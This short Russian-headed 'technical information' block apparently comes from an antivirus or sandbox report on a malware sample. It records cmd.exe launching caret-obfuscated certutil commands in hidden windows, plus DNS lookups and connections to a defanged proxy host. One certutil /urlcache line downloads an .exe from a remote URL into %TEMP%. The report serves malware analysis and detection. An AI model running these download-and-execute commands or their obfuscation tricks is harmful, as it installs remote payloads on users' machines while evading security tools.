Техническая информация
- '<SYSTEM32>\cmd.exe' /c STaRt /b /Min ^^^C^^E^r^^^t^^^U^t^^I^^l^^^.^E^x^e /UrLcAChe ...
- 'vi#.#ypothes.is':443
- 'vi#.#ypothes.is':443
- DNS ASK vi#.#ypothes.is
- '<SYSTEM32>\cmd.exe' /S /D /c" STaRt /b /Min ^C^Er^t^Ut^I^l^.Exe /UrLcAChe -sPLiT -F https...
- '<SYSTEM32>\cmd.exe' /Start /B /MIN pinG.Exe
- '<SYSTEM32>\certutil.exe' /UrLcAChe -sPLiT -F https://via.hypothes.is/boyama.medyanef.com/vendor/hamcrest/files/phy__1__31629__2649094674__1605642612.exe %TEMP%\100rn.exe
- '<SYSTEM32>\cmd.exe' /c STaRt /b /Min ^^^C^^E^r^^^t^^^U^t^^I^^l^^^.^E^x^e /UrLcAChe ... (со скрытым окном)